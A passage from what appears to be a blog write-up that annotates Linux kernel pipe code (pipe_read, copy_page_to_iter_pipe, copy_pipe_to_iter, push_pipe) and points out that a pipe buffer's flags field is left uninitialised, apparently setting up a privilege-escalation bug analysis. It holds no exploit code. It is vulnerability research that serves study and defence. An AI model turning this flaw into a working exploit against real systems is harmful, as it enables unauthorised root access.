<span class="type">unsigned</span> <span class="type">int</span> limit)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">pipe_occupancy</span>(head, tail) &gt;= limit;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As we can see, if <code>pipe-&gt;head - pipe-&gt;tail &gt;= pipe-&gt;max_usage</code>, the pipe's data area is full. Conversely, checking whether a pipe is empty is just as simple:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * pipe_empty - Return true if the pipe is empty</span></span><br><span class="line"><span class="comment"> * @head: The pipe ring head pointer</span></span><br><span class="line"><span class="comment"> * @tail: The pipe ring tail pointer</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">bool</span> <span class="title">pipe_empty</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> head, <span class="type">unsigned</span> <span class="type">int</span> tail)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> head == tail;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Back in <code>pipe_read</code>, the kernel now reads the pipe in a loop:</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span 
class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> head = pipe-&gt;head;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> tail = pipe-&gt;tail;</span><br><span class="line">    <span class="comment">// pipe-&gt;ring_size is a power of two, so ring_size - 1 is an all-ones bit mask (0b111...1)</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="comment">// If the pipe contains data</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">pipe_empty</span>(head, tail)) &#123;</span><br><span class="line">        <span class="comment">// Get the pipe_buffer at tail (the oldest unread slot). head and tail may exceed max_usage because bufs is designed as a ring and is indexed through the mask</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[tail &amp; mask];</span><br><span class="line">        <span class="comment">// Number of bytes available in the buf being read</span></span><br><span class="line">        <span class="type">size_t</span> chars = buf-&gt;len;</span><br><span class="line">        <span class="type">size_t</span>
written;</span><br><span class="line">        <span class="type">int</span> error;</span><br><span class="line">    </span><br><span class="line">        <span class="comment">// If the buf holds more than the requested length, clamp to the requested length</span></span><br><span class="line">        <span class="keyword">if</span> (chars &gt; total_len)</span><br><span class="line">            chars = total_len;</span><br><span class="line">        <span class="comment">// Call the confirm method of the pipe buf to make sure the data in the pipe buffer is valid</span></span><br><span class="line">        error = <span class="built_in">pipe_buf_confirm</span>(pipe, buf);</span><br><span class="line">        <span class="keyword">if</span> (error) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!ret)</span><br><span class="line">                ret = error;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">        <span class="comment">// Copy the memory page backing the current pipe buffer into to</span></span><br><span class="line">        written = <span class="built_in">copy_page_to_iter</span>(buf-&gt;page, buf-&gt;offset, chars, to);</span><br><span class="line">        <span class="comment">// A short copy (written &lt; chars) means an unrecoverable error occurred while copying; bail out</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(written &lt; chars)) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!ret)</span><br><span class="line">                ret = -EFAULT;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// One round of reading is done; if the remaining length is still nonzero, get ready to loop again</span></span><br><span class="line">        ret += chars;</span><br><span class="line">        buf-&gt;offset += chars;</span><br><span class="line">        buf-&gt;len -= chars;</span><br><span
class="line"></span><br><span class="line">        <span class="comment">/* Was it a packet buffer? Clean up and exit */</span></span><br><span class="line">        <span class="comment">// Applies when the fd referring to this pipe has the O_DIRECT flag set; see pipe_write for how that flag is used</span></span><br><span class="line">        <span class="keyword">if</span> (buf-&gt;flags &amp; PIPE_BUF_FLAG_PACKET) &#123;</span><br><span class="line">            total_len = chars;</span><br><span class="line">            buf-&gt;len = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// If the current pipe buffer has been fully read, advance tail to the next pipe buffer</span></span><br><span class="line">        <span class="keyword">if</span> (!buf-&gt;len) &#123;</span><br><span class="line">            <span class="built_in">pipe_buf_release</span>(pipe, buf);</span><br><span class="line">            <span class="built_in">spin_lock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line">            tail++;</span><br><span class="line">            pipe-&gt;tail = tail;</span><br><span class="line">            <span class="built_in">spin_unlock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line">        &#125;</span><br><span class="line">        total_len -= chars;</span><br><span class="line">        <span class="comment">// Everything requested has been read; leave the loop</span></span><br><span class="line">        <span class="keyword">if</span> (!total_len)</span><br><span class="line">            <span class="keyword">break</span>;    <span class="comment">/* common path: read succeeded */</span></span><br><span class="line">        <span class="comment">// More data is wanted and the pipe still has some, so keep looping</span></span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">pipe_empty</span>(head, tail))    <span class="comment">/* More to do?
*/</span></span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!pipe-&gt;writers)</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> (ret)</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> (filp-&gt;f_flags &amp; O_NONBLOCK) &#123;</span><br><span class="line">        ret = -EAGAIN;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    __pipe_unlock(pipe);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">         * We only get here if we didn&#x27;t actually read anything.</span></span><br><span class="line"><span class="comment">         * ...</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">    ...;</span><br><span class="line">&#125;</span><br><span class="line">...;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> ret;</span><br></pre></td></tr></table></figure><h3 id="3-copy-page-to-iter-相关">3. 
copy_page_to_iter and related code</h3><p>The comments in <code>pipe_read</code> above outline how a pipe is read. Within that flow, <code>copy_page_to_iter</code> chooses what to do based on the <code>type</code> field of the <code>to</code> variable:</p><blockquote><p>Whichever branch is taken, the overall job is the same: copy the given page to the location the iov_iter points to.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include/linux/uio.h</span></span><br><span class="line"><span class="function"><span class="type">static</span> __always_inline __must_check</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">copy_to_iter</span><span class="params">(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes, <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!<span class="built_in">check_copy_size</span>(addr, bytes,
<span class="literal">true</span>)))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> _copy_to_iter(addr, bytes, i);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// lib/iov_iter.c</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">copy_page_to_iter</span><span class="params">(<span class="keyword">struct</span> page *page, <span class="type">size_t</span> offset, <span class="type">size_t</span> bytes,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Check that the copy stays in bounds; this check normally passes</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!<span class="built_in">page_copy_sane</span>(page, offset, bytes)))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (i-&gt;type &amp; (ITER_BVEC|ITER_KVEC)) &#123;</span><br><span class="line">        <span class="type">void</span> *kaddr = <span class="built_in">kmap_atomic</span>(page);</span><br><span class="line">        <span class="type">size_t</span> wanted = <span class="built_in">copy_to_iter</span>(kaddr + offset, bytes, i);</span><br><span class="line">        <span class="built_in">kunmap_atomic</span>(kaddr);</span><br><span class="line">        <span class="keyword">return</span> wanted;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span
class="keyword">if</span> (<span class="built_in">unlikely</span>(<span class="built_in">iov_iter_is_discard</span>(i)))</span><br><span class="line">        <span class="keyword">return</span> bytes;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">likely</span>(!<span class="built_in">iov_iter_is_pipe</span>(i))) </span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">copy_page_to_iter_iovec</span>(page, offset, bytes, i);</span><br><span class="line">    <span class="keyword">else</span> <span class="comment">// (i-&gt;type &amp; ~(READ | WRITE)) == ITER_PIPE</span></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">copy_page_to_iter_pipe</span>(page, offset, bytes, i);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here we only look at how data is copied when <code>to</code> is itself a pipe, that is, the <code>copy_page_to_iter_pipe</code> function. The whole function is quite short:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">size_t</span> <span class="title">copy_page_to_iter_pipe</span><span class="params">(<span class="keyword">struct</span> page *page, <span class="type">size_t</span> offset, <span class="type">size_t</span> bytes,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// The pipe structure that will be written to</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe = i-&gt;pipe;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf;</span><br><span class="line">    <span class="comment">// Fetch some state of the destination pipe, such as head and tail</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_tail = pipe-&gt;tail;</span><br><span class="line">    <span
class="type">unsigned</span> <span class="type">int</span> p_mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i_head = i-&gt;head;</span><br><span class="line">    <span class="type">size_t</span> off;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// A few sanity checks</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(bytes &gt; i-&gt;count))</span><br><span class="line">        bytes = i-&gt;count;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!bytes))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">sanity</span>(i))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="comment">// Relative offset at which to write</span></span><br><span class="line">    off = i-&gt;iov_offset;</span><br><span class="line">    <span class="comment">// The pipe buf that will receive the data</span></span><br><span class="line">    buf = &amp;pipe-&gt;bufs[i_head &amp; p_mask];</span><br><span class="line">    <span class="keyword">if</span> (off) &#123;</span><br><span class="line">        <span class="keyword">if</span> (offset == off &amp;&amp; buf-&gt;page == page) &#123;</span><br><span class="line">            <span class="comment">/* merge with the last one */</span></span><br><span class="line">            buf-&gt;len += bytes;</span><br><span class="line">            i-&gt;iov_offset += bytes;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span
class="line">        i_head++;</span><br><span class="line">        buf = &amp;pipe-&gt;bufs[i_head &amp; p_mask];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// If the destination pipe is full, return immediately</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">pipe_full</span>(i_head, p_tail, pipe-&gt;max_usage))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    buf-&gt;ops = &amp;page_cache_pipe_buf_ops;</span><br><span class="line">    <span class="comment">// Increase the refcount of the page</span></span><br><span class="line">    <span class="built_in">get_page</span>(page);</span><br><span class="line">    buf-&gt;page = page;   <span class="comment">// Reference the existing page directly</span></span><br><span class="line">    buf-&gt;offset = offset;</span><br><span class="line">    buf-&gt;len = bytes;</span><br><span class="line"></span><br><span class="line">    pipe-&gt;head = i_head + <span class="number">1</span>;</span><br><span class="line">    i-&gt;iov_offset = offset + bytes;</span><br><span class="line">    i-&gt;head = i_head;</span><br><span class="line">out:</span><br><span class="line">    i-&gt;count -= bytes;</span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The key point, briefly: when data from a new page is copied into the receiving (recv) pipe buf, <strong>the recv pipe buf simply takes a reference to that page</strong> and records the offset and len of the copied range, which avoids the cost of a real copy. If every copy involves a different page, the recv pipe bufs hold references to different pages, and the offset and len of each buf may cover only part of its page.</p><p>Note: because the pipe buf here <strong>references another page directly</strong>, <code>pipe_write</code> <strong>must make sure that newly arriving data is never written into such a page</strong>, and that guarantee depends on the MERGE flag.</p><p>Something interesting shows up here: <strong>although most fields of the recv pipe buf structure are reassigned, one field is left out, and that is the flags field</strong>!</p><h3 id="4-copy-to-iter-相关">4.
copy_to_iter and related code</h3><p>Besides <code>pipe_read</code> calling <code>copy_page_to_iter</code>, which in turn reaches <code>copy_page_to_iter_pipe</code> to <strong>transfer data into a pipe</strong>, the <code>copy_to_iter</code> function can also be used to move data into a pipe:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> __always_inline __must_check</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">copy_to_iter</span><span class="params">(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes, <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!<span class="built_in">check_copy_size</span>(addr, bytes, <span class="literal">true</span>)))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span
class="keyword">return</span> _copy_to_iter(addr, bytes, i);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">size_t</span> _copy_to_iter(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes, <span class="keyword">struct</span> iov_iter *i)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *from = addr;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(<span class="built_in">iov_iter_is_pipe</span>(i))) <span class="comment">// pipe case</span></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">copy_pipe_to_iter</span>(addr, bytes, i);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">iter_is_iovec</span>(i))</span><br><span class="line">        <span class="built_in">might_fault</span>();</span><br><span class="line">    <span class="built_in">iterate_and_advance</span>(i, bytes, v,</span><br><span class="line">        <span class="built_in">copyout</span>(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),</span><br><span class="line">        <span class="built_in">memcpy_to_page</span>(v.bv_page, v.bv_offset,</span><br><span class="line">                   (from += v.bv_len) - v.bv_len, v.bv_len),</span><br><span class="line">        <span class="built_in">memcpy</span>(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>copy_to_iter has many call sites, so there is very likely at least one that uses <code>copy_to_iter</code> to write data into a pipe. In that case control flow can go through <code>copy_to_iter -&gt; _copy_to_iter -&gt; copy_pipe_to_iter</code>
to reach the code that actually performs the data copy:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">size_t</span> <span class="title">copy_pipe_to_iter</span><span class="params">(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes,</span></span></span><br><span class="line"><span class="params"><span class="function">                <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Get the pipe structure</span></span><br><span class="line">    <span
class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe = i-&gt;pipe;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i_head;</span><br><span class="line">    <span class="type">size_t</span> n, off;</span><br><span class="line">    <span class="comment">// Sanity check</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">sanity</span>(i))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*  Judging from the code, push_pipe does the following:</span></span><br><span class="line"><span class="comment">        1. Determine how many bytes can be written to the pipe (it may not have enough room)</span></span><br><span class="line"><span class="comment">        2. Prepare the pipe_bufs that will receive the data</span></span><br><span class="line"><span class="comment">        3. Fetch the current head position of the pipe</span></span><br><span class="line"><span class="comment">        4.
Fetch the relative offset off within the page currently being written</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    <span class="comment">// n is the number of bytes to write</span></span><br><span class="line">    bytes = n = <span class="built_in">push_pipe</span>(i, bytes, &amp;i_head, &amp;off);</span><br><span class="line">    <span class="comment">// If there is nothing to write, return immediately. This branch is rarely taken.</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!n))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// Write into the pipe until all data has been written. Each iteration either fills the page to its end, or writes a final partial chunk after which the loop exits</span></span><br><span class="line">    <span class="keyword">do</span> &#123;</span><br><span class="line">        <span class="comment">// Number of bytes that can be written in this iteration</span></span><br><span class="line">        <span class="type">size_t</span> chunk = <span class="built_in">min_t</span>(<span class="type">size_t</span>, n, PAGE_SIZE - off);</span><br><span class="line">        <span class="built_in">memcpy_to_page</span>(pipe-&gt;bufs[i_head &amp; p_mask].page, off, addr, chunk);</span><br><span class="line">        i-&gt;head = i_head;</span><br><span class="line">        i-&gt;iov_offset = off + chunk;</span><br><span class="line">        n -= chunk;</span><br><span class="line">        addr += chunk;</span><br><span class="line">        off = <span class="number">0</span>;</span><br><span class="line">        i_head++;</span><br><span class="line">    &#125; <span class="keyword">while</span> (n);</span><br><span class="line">    <span class="comment">// Update the number of bytes the iov_iter still has to write</span></span><br><span class="line">    i-&gt;count -= bytes;</span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Next, let us look at the <code>push_pipe</code> function; as the comments above suggest, it is a fairly important one:</p><figure class="highlight
cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">size_t</span> 
<span class="title">push_pipe</span><span class="params">(<span class="keyword">struct</span> iov_iter *i, <span class="type">size_t</span> size,</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">int</span> *iter_headp, <span class="type">size_t</span> *offp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// The pipe that receives the data</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe = i-&gt;pipe;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_tail = pipe-&gt;tail;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> iter_head;</span><br><span class="line">    <span class="type">size_t</span> off;</span><br><span class="line">    <span class="type">ssize_t</span> left;</span><br><span class="line">    <span class="comment">// Routine sanity checks, not discussed here</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(size &gt; i-&gt;count))</span><br><span class="line">        size = i-&gt;count;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!size))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    left = size;</span><br><span class="line">    <span class="comment">/* data_start fetches the pipe head &amp; the starting offset.</span></span><br><span class="line"><span class="comment">       It filters out the cases where head points at a previous pipe buf that was not allocated, or where offset == PAGE_SIZE */</span></span><br><span class="line">    <span 
class="built_in">data_start</span>(i, &amp;iter_head, &amp;off);</span><br><span class="line">    *iter_headp = iter_head;</span><br><span class="line">    *offp = off;</span><br><span class="line">    <span class="comment">// If writing starts in the middle of a page</span></span><br><span class="line">    <span class="keyword">if</span> (off) &#123;</span><br><span class="line">        <span class="comment">// Check whether the rest of this page is enough</span></span><br><span class="line">        left -= PAGE_SIZE - off;</span><br><span class="line">        <span class="comment">// If it is, return right away</span></span><br><span class="line">        <span class="keyword">if</span> (left &lt;= <span class="number">0</span>) &#123;</span><br><span class="line">            pipe-&gt;bufs[iter_head &amp; p_mask].len += size;</span><br><span class="line">            <span class="keyword">return</span> size;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Otherwise, first extend this partially filled page to a full page</span></span><br><span class="line">        pipe-&gt;bufs[iter_head &amp; p_mask].len = PAGE_SIZE;</span><br><span class="line">        iter_head++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// From here on, keep adding pages in a loop</span></span><br><span class="line">    <span class="keyword">while</span> (!<span class="built_in">pipe_full</span>(iter_head, p_tail, pipe-&gt;max_usage)) &#123;</span><br><span class="line">        <span class="comment">// Take the next pipe_buffer and initialize its fields</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[iter_head &amp; p_mask];</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">page</span> *page = <span class="built_in">alloc_page</span>(GFP_USER);</span><br><span class="line">        <span class="keyword">if</span> (!page)</span><br><span class="line">            <span 
